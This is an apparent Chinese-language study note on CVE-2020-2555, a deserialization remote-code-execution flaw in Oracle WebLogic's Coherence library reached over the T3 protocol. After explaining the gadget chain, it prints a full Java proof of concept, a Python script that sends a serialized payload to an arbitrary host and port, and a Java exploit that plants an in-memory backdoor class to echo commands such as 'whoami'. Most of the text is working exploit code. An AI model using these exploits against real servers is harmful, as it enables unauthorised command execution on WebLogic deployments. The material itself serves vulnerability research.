前言:作為weblogic中間件的CVE-2020-2555分析筆記
CVE-2020-2555介紹
2020年1月15日,Oracle發布了一系列的安全補丁,其中Oracle WebLogic Server產品有高危漏洞,漏洞編號CVE-2020-2551。
成因:
1、Weblogic 默認開啟 T3 協議,攻擊者可利用T3協議進行反序列化漏洞實現遠程代碼執行。
2、CVE-2020-2555主要源於在coherence.jar存在着用於gadget構造的類(反序列化構造類),並且利用weblogic默認存在的T3協議進行傳輸和解析進而導致weblogic服務器反序列化惡意代碼最后執行攻擊語句。
環境配置
Weblogic Server版本12.2.1.4.0
jdk 8u181
弄了一早上,自己簡單的記錄下,如果要改變weblogic啟動路徑/java變量目錄的話只需要在相關的啟動腳本中進行修改就可以,我這里修改了如下幾個路徑中的java變量目錄,weblogic的沒有修改,但是應該來說也是可以修改的,不過修改的數量比較多,所以自己這里就只修改了java的路徑。
我這里選擇的是wl_server目錄下的啟動程序,默認weblogic有三個啟動程序,在wl_server啟動監聽的是7001端口,其他的端口是不同,但都是一樣的。
C:\Oracle\Middleware\Oracle_Home\user_projects\domains\wl_server\bin\startWebLogic.cmd
C:\Oracle\Middleware\Oracle_Home\user_projects\domains\wl_server\bin\setDomainEnv.cmd
C:\Oracle\Middleware\Oracle_Home\user_projects\domains\wl_server\startWebLogic.cmd
接着訪問http://127.0.0.1:7001/console即可,如下圖所示
電腦配置跟不上,所以這里直接在本地進行調試了
什么是Weblogic T3協議
回顧下關於RMI協議,RMI協議是一個 JVM 中的代碼可以通過網絡實現遠程調用另一個JVM 的某個方法,它們之間的通信是通過序列化RemoteCall對象,然后通過socket來進行通信傳輸的。
而 T3 是用於在 WebLogic 服務器和其他類型的 Java 程序之間傳輸信息的協議,所以說weblogic實現通信傳輸的使用的是T3協議,自己理解的就是java的RMI實現遠程調用走的是JRMP協議,但是weblogic的RMI遠程調用走的是自己寫的T3協議。
為什么weblogic用T3,而不用JRMP?這種T3類型的連接通過消除用於在網絡之間進行通信的多個協議來最大化效率,從而使用較少的操作系統資源。用於T3連接的協議還可以提高效率並最大限度地減小數據包大小,從而提高傳輸方法的速度。
以下是T3協議的特點:
服務端可以持續追蹤監控客戶端是否存活(心跳機制),通常心跳的間隔為60秒,服務端在超過240秒未收到心跳即判定與客戶端的連接丟失。
通過建立一次連接可以將全部數據包傳輸完成,優化了數據包大小和網絡消耗。
參考文章:http://cn.voidcc.com/question/p-vhilltff-bgn.html
CVE-2020-2555漏洞分析
CVE-2020-2555主要源於在coherence.jar存在着用於gadget構造的類(反序列化構造類),並且利用weblogic默認存在的T3協議進行傳輸和解析進而導致weblogic服務器反序列化惡意代碼最后執行攻擊語句。
所以這里就直接去找coherence.jar包中的gadget,調用鏈如下:
* gadget:
* BadAttributeValueExpException.readObject()
* com.tangosol.util.filter.LimitFilter.toString()
* com.tangosol.util.extractor.ChainedExtractor.extract()
* com.tangosol.util.extractor.ReflectionExtractor.extract()
* Method.invoke()
* ...
* Runtime.getRuntime.exec()
com.tangosol.util.extractor.ReflectionExtractor
跟着調用鏈,先來看ReflectionExtractor類的exctract方法,可以看到通過傳輸一個oTarget對象,通過findMethod反射來獲取oTarget對象指定參數的方法,將其賦值給m_methodPrev字段,然后最后進行method.invoke方法調用。
public E extract(T oTarget) {
if (oTarget == null) {
return null;
} else {
Class clz = oTarget.getClass();
try {
Method method = this.m_methodPrev;
if (method == null || method.getDeclaringClass() != clz) {
this.m_methodPrev = method = ClassHelper.findMethod(clz, this.getMethodName(), ClassHelper.getClassArray(this.m_aoParam), false);
}
return method.invoke(oTarget, this.m_aoParam);
} catch (NullPointerException var4) {
throw new RuntimeException(this.suggestExtractFailureCause(clz));
} catch (Exception var5) {
throw ensureRuntimeException(var5, clz.getName() + this + '(' + oTarget + ')');
}
}
}
獲取oTarget對象指定參數的方法是this.m_methodPrev = method = ClassHelper.findMethod(clz, this.getMethodName(), ClassHelper.getClassArray(this.m_aoParam), false);
這里可以來看下它是如何獲取的,可以發現跟CC鏈條中的commons collections調用鏈是一樣的
public class CVE_2020_2555 {
public static void main(String[] args) throws Exception {
ReflectionExtractor reflectionExtractor = new ReflectionExtractor("getMethod", new Object[]{"getRuntime", new Class[0]});
Object extract = reflectionExtractor.extract(Runtime.class);
System.out.println(extract);
}
}
這里的話單純的ReflectionExtractor無法進行利用,原因如下
那么接下來繼續看com.tangosol.util.extractor.ChainedExtractor
com.tangosol.util.extractor.ChainedExtractor
可以發現ChainedExtractor的extract方法可以實現鏈式調用
@JsonbCreator
public ChainedExtractor(@JsonbProperty("extractors") ValueExtractor[] aExtractor) {
super(aExtractor);
this.m_nTarget = this.computeTarget();
}
public E extract(Object oTarget) {
ValueExtractor[] aExtractor = this.getExtractors();
int i = 0;
for(int c = aExtractor.length; i < c && oTarget != null; ++i) {
oTarget = aExtractor[i].extract(oTarget);
}
return oTarget;
}
那么到這里構造為如下,ChainedExtractor中傳入ReflectionExtractor數組對象,然后通過ChainedExtractor對象的extract方法進行鏈式調用
public class CVE_2020_2555 {
public static void main(String[] args) throws Exception {
ReflectionExtractor[] reflectionExtractors = new ReflectionExtractor[]{
new ReflectionExtractor("getMethod", new Object[]{"getRuntime", new Class[0]}),
new ReflectionExtractor("invoke", new Object[]{"null", new Class[0]}),
new ReflectionExtractor("exec", new Object[]{new String[]{"cmd", "/c", "calc"}})
};
ChainedExtractor chainedExtractor = new ChainedExtractor(reflectionExtractors);
chainedExtractor.extract(Runtime.class);
}
}
這里繼續來看下ChainedExtractor同樣無法進行利用,因為本身序列化無法調用extract
com.tangosol.util.filter.LimitFilter
直接看toString,可以看到其中的extractor.extract(this.m_oAnchorTop)有進行調用
public String toString() {
StringBuilder sb = new StringBuilder("LimitFilter: (");
sb.append(this.m_filter).append(" [pageSize=").append(this.m_cPageSize).append(", pageNum=").append(this.m_nPage);
if (this.m_comparator instanceof ValueExtractor) {
ValueExtractor extractor = (ValueExtractor)this.m_comparator;
sb.append(", top=").append(extractor.extract(this.m_oAnchorTop)).append(", bottom=").append(extractor.extract(this.m_oAnchorBottom));
} else if (this.m_comparator != null) {
sb.append(", comparator=").append(this.m_comparator);
}
sb.append("])");
return sb.toString();
}
繼續看extractor.extract(this.m_oAnchorTop)中的m_oAnchotTop,可以看到變量可控,那么就可以替換為Runtime.class來進行執行命令
這里需要注意下,因為ChainedExtractor是實現了Comparator接口的
測試如下,還是可以彈窗
同樣的自己反序列化還是無法解決調用自身的toString方法,所以還是需要找其他對象
BadAttributeValueExpException
BadAttributeValueExpException的反序列化會調用指定對象的toString方法
測試下,可以觸發的
最終的POC如下,建議全用反射來進行賦值,要不然會有問題
public class CVE_2020_2555 {
public static void main(String[] args) throws Exception {
ReflectionExtractor[] reflectionExtractors = new ReflectionExtractor[]{
new ReflectionExtractor("getMethod", new Object[]{"getRuntime", new Class[0]}),
new ReflectionExtractor("invoke", new Object[]{"null", new Class[0]}),
new ReflectionExtractor("exec", new Object[]{new String[]{"cmd", "/c", "calc"}})
};
ChainedExtractor chainedExtractor = new ChainedExtractor(reflectionExtractors);
LimitFilter limitFilter = new LimitFilter();
Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator");
m_comparator.setAccessible(true);
m_comparator.set(limitFilter, chainedExtractor);
Field m_oAnchorTop = limitFilter.getClass().getDeclaredField("m_oAnchorTop");
m_oAnchorTop.setAccessible(true);
m_oAnchorTop.set(limitFilter, Runtime.class);
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
Field val = badAttributeValueExpException.getClass().getDeclaredField("val");
val.setAccessible(true);
val.set(badAttributeValueExpException, limitFilter);
try {
ObjectOutputStream os = new ObjectOutputStream(new FileOutputStream("weblogic_2020_2551.ser"));
os.writeObject(badAttributeValueExpException);
os.close();
ObjectInputStream is = new ObjectInputStream(new FileInputStream("weblogic_2020_2551.ser"));
is.readObject();
} catch (Exception e) {
e.printStackTrace();
}
}
}
如果通過T3協議來進行利用?
知識點:weblogic的T3和HTTP服務是共存在7001端口的
這里構造完應該是通過T3傳輸到對方的解析點的,這里看下如何進行傳輸的
參考文章:http://drops.xmd5.com/static/drops/web-13470.html
我直接進行截圖了,放到博客里面記錄觀察
使用如下的方式來進行實現
這里直接給格式就可以了,替換中間的payloadObj數據即可
# author: zpchcbd
import socket
import os
import sys
import struct
from binascii import a2b_hex, b2a_hex
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(5)
server_address = (sys.argv[1], int(sys.argv[2]))
print('[+] Connecting to {} port {}'.format(server_address[0], server_address[1]))
sock.connect(server_address)
# Send headers
headers='t3 12.2.1\nAS:255\nHL:19\nMS:10000000\nPU:t3://us-l-breens:7001\n\n'
print('sending "{}"'.format(headers))
sock.sendall(headers.encode())
data = sock.recv(1024)
print('[+] received "%s"' % data)
payloadObj = open(sys.argv[3],'rb').read()
payload = '056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'
payload=payload+str(b2a_hex(payloadObj).decode())
payload=payload+'fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'
payload = '%s%s' % (('{:08x}'.format(len(payload) // 2 + 4), payload))
print('[+] Sending payload...')
sock.send(bytes.fromhex(payload))
data = sock.recv(1024)
print('received "%s"' % data)
回顯
這里就不分析了,大家自己可以試下,我講下自己遇到的坑
坑點:因為自己是高版本的12.2.1.4.0,所以自己網上看到的通過DefiningClassLoader來進行反序列化RMI實例是不行的
然后這里通過這個類ClasspathClassLoader來進行反序列化RMI的,它的defineClass同樣是一個公有的,並且以字節數組來進行defineClass
package com.zpchcbd.weblogic;
import com.supeream.ssl.WeblogicTrustManager;
import com.supeream.weblogic.T3ProtocolOperation;
import com.tangosol.util.ValueExtractor;
import com.tangosol.util.extractor.ChainedExtractor;
import com.tangosol.util.extractor.ReflectionExtractor;
import com.tangosol.util.filter.LimitFilter;
import org.mozilla.classfile.DefiningClassLoader;
import weblogic.cluster.singleton.ClusterMasterRemote;
import weblogic.corba.utils.MarshalledObject;
import weblogic.jndi.Environment;
import weblogic.utils.classloaders.ClasspathClassLoader;
import javax.management.BadAttributeValueExpException;
import javax.naming.Context;
import java.io.ByteArrayOutputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
public class CVE_2020_2555_UP {
static String host = "192.168.0.108";
static String port = "7001";
static final String className = "com.zpchcbd.weblogic.RemoteImpl";
static byte[] classByte = new byte[]{-54,-2,-70,-66,0,0,0,52,0,-123,10,0,30,0,80,7,0,81,10,0,2,0,80,7,0,82,10,0,4,0,80,8,0,83,11,0,84,0,85,7,0,86,7,0,87,10,0,9,0,80,8,0,50,11,0,88,0,89,8,0,90,7,0,91,10,0,14,0,92,10,0,14,0,93,10,0,14,0,94,7,0,95,7,0,96,10,0,97,0,98,10,0,19,0,99,10,0,18,0,100,7,0,101,10,0,23,0,80,10,0,18,0,102,10,0,23,0,103,8,0,104,10,0,23,0,105,10,0,8,0,106,7,0,107,7,0,108,1,0,6,60,105,110,105,116,62,1,0,3,40,41,86,1,0,4,67,111,100,101,1,0,15,76,105,110,101,78,117,109,98,101,114,84,97,98,108,101,1,0,18,76,111,99,97,108,86,97,114,105,97,98,108,101,84,97,98,108,101,1,0,4,116,104,105,115,1,0,33,76,99,111,109,47,122,112,99,104,99,98,100,47,119,101,98,108,111,103,105,99,47,82,101,109,111,116,101,73,109,112,108,59,1,0,4,109,97,105,110,1,0,22,40,91,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,41,86,1,0,6,114,101,109,111,116,101,1,0,7,99,111,110,116,101,120,116,1,0,22,76,106,97,118,97,120,47,110,97,109,105,110,103,47,67,111,110,116,101,120,116,59,1,0,4,97,114,103,115,1,0,19,91,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,1,0,13,83,116,97,99,107,77,97,112,84,97,98,108,101,7,0,86,1,0,17,115,101,116,83,101,114,118,101,114,76,111,99,97,116,105,111,110,1,0,39,40,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,41,86,1,0,3,99,109,100,1,0,18,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,1,0,10,69,120,99,101,112,116,105,111,110,115,7,0,109,1,0,17,103,101,116,83,101,114,118,101,114,76,111,99,97,116,105,111,110,1,0,38,40,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,41,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,1,0,4,99,109,100,115,1,0,16,76,106,97,118,97,47,117,116,105,108,47,76,105,115,116,59,1,0,14,112,114,111,99,101,115,115,66,117,105,108,100,101,114,1,0,26,76,106,97,118,97,47,108,97,110,103,47,80,114,111,99,101,115,115,66,117,105,108,100,101,114,59,1,0,4,112,114,111,99,1,0,19,76,106,97,118,97,47,108,97,110,103,47,80,114,111,99,101,115,115,59,1,0,2,98,114,1,0,24,76,106,97,118,97,47,105,111,47,66,117,102,102,101,114,101,100,82,101,97,100,101,114,59,1,0,2,115,98,1,0,24,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,66,117,102,102,101,114,59,1,0,4,108,105,110,101,1,0,1,101,1,0,21,76,106,97,118,97,47,108,97,110,103,47,69,120,99,101,112,116,105,111,110,59,1,0,22,76,111,99,97,108,86,97,114,105,97,98,108,101,84,121,112,101,84,97,98,108,101,1,0,36,76,106,97,118,97,47,117,116,105,108,47,76,105,115,116,60,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,62,59,7,0,81,7,0,110,7,0,111,7,0,91,7,0,112,7,0,95,7,0,101,1,0,10,83,111,117,114,99,101,70,105,108,101,1,0,15,82,101,109,111,116,101,73,109,112,108,46,106,97,118,97,12,0,32,0,33,1,0,31,99,111,109,47,122,112,99,104,99,98,100,47,119,101,98,108,111,103,105,99,47,82,101,109,111,116,101,73,109,112,108,1,0,27,106,97,118,97,120,47,110,97,109,105,110,103,47,73,110,105,116,105,97,108,67,111,110,116,101,120,116,1,0,7,122,112,99,104,99,98,100,7,0,113,12,0,114,0,115,1,0,19,106,97,118,97,47,108,97,110,103,47,69,120,99,101,112,116,105,111,110,1,0,19,106,97,118,97,47,117,116,105,108,47,65,114,114,97,121,76,105,115,116,7,0,111,12,0,116,0,117,1,0,2,47,99,1,0,24,106,97,118,97,47,108,97,110,103,47,80,114,111,99,101,115,115,66,117,105,108,100,101,114,12,0,32,0,118,12,0,119,0,120,12,0,121,0,122,1,0,22,106,97,118,97,47,105,111,47,66,117,102,102,101,114,101,100,82,101,97,100,101,114,1,0,25,106,97,118,97,47,105,111,47,73,110,112,117,116,83,116,114,101,97,109,82,101,97,100,101,114,7,0,112,12,0,123,0,124,12,0,32,0,125,12,0,32,0,126,1,0,22,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,66,117,102,102,101,114,12,0,127,0,-128,12,0,-127,0,-126,1,0,1,10,12,0,-125,0,-128,12,0,-124,0,-128,1,0,16,106,97,118,97,47,108,97,110,103,47,79,98,106,101,99,116,1,0,46,119,101,98,108,111,103,105,99,47,99,108,117,115,116,101,114,47,115,105,110,103,108,101,116,111,110,47,67,108,117,115,116,101,114,77,97,115,116,101,114,82,101,109,111,116,101,1,0,24,106,97,118,97,47,114,109,105,47,82,101,109,111,116,101,69,120,99,101,112,116,105,111,110,1,0,16,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,1,0,14,106,97,118,97,47,117,116,105,108,47,76,105,115,116,1,0,17,106,97,118,97,47,108,97,110,103,47,80,114,111,99,101,115,115,1,0,20,106,97,118,97,120,47,110,97,109,105,110,103,47,67,111,110,116,101,120,116,1,0,6,114,101,98,105,110,100,1,0,39,40,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,76,106,97,118,97,47,108,97,110,103,47,79,98,106,101,99,116,59,41,86,1,0,3,97,100,100,1,0,21,40,76,106,97,118,97,47,108,97,110,103,47,79,98,106,101,99,116,59,41,90,1,0,19,40,76,106,97,118,97,47,117,116,105,108,47,76,105,115,116,59,41,86,1,0,19,114,101,100,105,114,101,99,116,69,114,114,111,114,83,116,114,101,97,109,1,0,29,40,90,41,76,106,97,118,97,47,108,97,110,103,47,80,114,111,99,101,115,115,66,117,105,108,100,101,114,59,1,0,5,115,116,97,114,116,1,0,21,40,41,76,106,97,118,97,47,108,97,110,103,47,80,114,111,99,101,115,115,59,1,0,14,103,101,116,73,110,112,117,116,83,116,114,101,97,109,1,0,23,40,41,76,106,97,118,97,47,105,111,47,73,110,112,117,116,83,116,114,101,97,109,59,1,0,24,40,76,106,97,118,97,47,105,111,47,73,110,112,117,116,83,116,114,101,97,109,59,41,86,1,0,19,40,76,106,97,118,97,47,105,111,47,82,101,97,100,101,114,59,41,86,1,0,8,114,101,97,100,76,105,110,101,1,0,20,40,41,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,1,0,6,97,112,112,101,110,100,1,0,44,40,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,59,41,76,106,97,118,97,47,108,97,110,103,47,83,116,114,105,110,103,66,117,102,102,101,114,59,1,0,8,116,111,83,116,114,105,110,103,1,0,10,103,101,116,77,101,115,115,97,103,101,0,33,0,2,0,30,0,1,0,31,0,0,0,4,0,1,0,32,0,33,0,1,0,34,0,0,0,47,0,1,0,1,0,0,0,5,42,-73,0,1,-79,0,0,0,2,0,35,0,0,0,6,0,1,0,0,0,13,0,36,0,0,0,12,0,1,0,0,0,5,0,37,0,38,0,0,0,9,0,39,0,40,0,1,0,34,0,0,0,-123,0,3,0,3,0,0,0,30,-69,0,2,89,-73,0,3,76,-69,0,4,89,-73,0,5,77,44,18,6,43,-71,0,7,3,0,-89,0,4,76,-79,0,1,0,0,0,25,0,28,0,8,0,3,0,35,0,0,0,26,0,6,0,0,0,17,0,8,0,18,0,16,0,19,0,25,0,22,0,28,0,20,0,29,0,23,0,36,0,0,0,32,0,3,0,8,0,17,0,41,0,38,0,1,0,16,0,9,0,42,0,43,0,2,0,0,0,30,0,44,0,45,0,0,0,46,0,0,0,7,0,2,92,7,0,47,0,0,1,0,48,0,49,0,2,0,34,0,0,0,63,0,0,0,3,0,0,0,1,-79,0,0,0,2,0,35,0,0,0,6,0,1,0,0,0,29,0,36,0,0,0,32,0,3,0,0,0,1,0,37,0,38,0,0,0,0,0,1,0,50,0,51,0,1,0,0,0,1,0,44,0,51,0,2,0,52,0,0,0,4,0,1,0,53,0,1,0,54,0,55,0,2,0,34,0,0,1,126,0,5,0,8,0,0,0,124,-69,0,9,89,-73,0,10,77,44,18,11,-71,0,12,2,0,87,44,18,13,-71,0,12,2,0,87,44,43,-71,0,12,2,0,87,-69,0,14,89,44,-73,0,15,78,45,4,-74,0,16,87,45,-74,0,17,58,4,-69,0,18,89,-69,0,19,89,25,4,-74,0,20,-73,0,21,-73,0,22,58,5,-69,0,23,89,-73,0,24,58,6,25,5,-74,0,25,89,58,7,-58,0,19,25,6,25,7,-74,0,26,18,27,-74,0,26,87,-89,-1,-24,25,6,-74,0,28,-80,77,44,-74,0,29,-80,0,1,0,0,0,117,0,118,0,8,0,4,0,35,0,0,0,58,0,14,0,0,0,36,0,8,0,38,0,17,0,39,0,26,0,40,0,34,0,42,0,43,0,43,0,49,0,44,0,55,0,46,0,76,0,47,0,85,0,50,0,96,0,51,0,112,0,54,0,118,0,55,0,119,0,56,0,36,0,0,0,92,0,9,0,8,0,110,0,56,0,57,0,2,0,43,0,75,0,58,0,59,0,3,0,55,0,63,0,60,0,61,0,4,0,76,0,42,0,62,0,63,0,5,0,85,0,33,0,64,0,65,0,6,0,93,0,25,0,66,0,51,0,7,0,119,0,5,0,67,0,68,0,2,0,0,0,124,0,37,0,38,0,0,0,0,0,124,0,50,0,51,0,1,0,69,0,0,0,12,0,1,0,8,0,110,0,56,0,70,0,2,0,46,0,0,0,52,0,3,-1,0,85,0,7,7,0,71,7,0,72,7,0,73,7,0,74,7,0,75,7,0,76,7,0,77,0,0,-4,0,26,7,0,72,-1,0,5,0,2,7,0,71,7,0,72,0,1,7,0,47,0,52,0,0,0,4,0,1,0,53,0,1,0,78,0,0,0,2,0,79};
public static void main(String[] args) throws Exception {
try {
String url = "t3://" + host + ":" + port;
// 安裝RMI實例
// invokeRMI(className, classByte);
// 調用RMI實例執行命令
Environment environment = new Environment();
environment.setProviderUrl(url);
environment.setEnableServerAffinity(false);
environment.setSSLClientTrustManager(new WeblogicTrustManager());
Context context = environment.getInitialContext();
ClusterMasterRemote remote = (ClusterMasterRemote) context.lookup("zpchcbd");
String res = remote.getServerLocation("whoami");
System.out.println(res);
} catch (Exception e) {
e.printStackTrace();
}
}
private static void invokeRMI(String className, byte[] classByte) throws Exception {
ValueExtractor[] valueExtractors = new ValueExtractor[]{
new ReflectionExtractor("getDeclaredConstructor", new Object[]{new Class[0]}),
new ReflectionExtractor("newInstance", new Object[]{new Object[0]}),
new ReflectionExtractor("defineCodeGenClass", new Object[]{className, classByte, null}),
new ReflectionExtractor("getMethod", new Object[]{"main", new Class[]{String[].class}}),
new ReflectionExtractor("invoke", new Object[]{null, new Object[]{null}})
};
ChainedExtractor chainedExtractor = new ChainedExtractor(valueExtractors);
LimitFilter limitFilter = new LimitFilter();
Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator");
m_comparator.setAccessible(true);
m_comparator.set(limitFilter, chainedExtractor);
Field m_oAnchorTop = limitFilter.getClass().getDeclaredField("m_oAnchorTop");
m_oAnchorTop.setAccessible(true);
m_oAnchorTop.set(limitFilter, ClasspathClassLoader.class);
BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null);
Field val = badAttributeValueExpException.getClass().getDeclaredField("val");
val.setAccessible(true);
val.set(badAttributeValueExpException, limitFilter);
Object obj = new MarshalledObject(badAttributeValueExpException);
ByteArrayOutputStream out = new ByteArrayOutputStream();
ObjectOutputStream objOut = new ObjectOutputStream(out);
objOut.writeObject(obj);
objOut.flush();
objOut.close();
byte[] payload = out.toByteArray();
T3ProtocolOperation.send(host, port, payload);
}
}
效果圖如下
修復方案
因為這個類是屬於黑名單繞過的方式,所以官方的修復方案是將 ReflectionExtractor 添加到黑名單中。但是CVE-2020-2883就繞過了這次方式,下一篇學習CVE-2020-2883。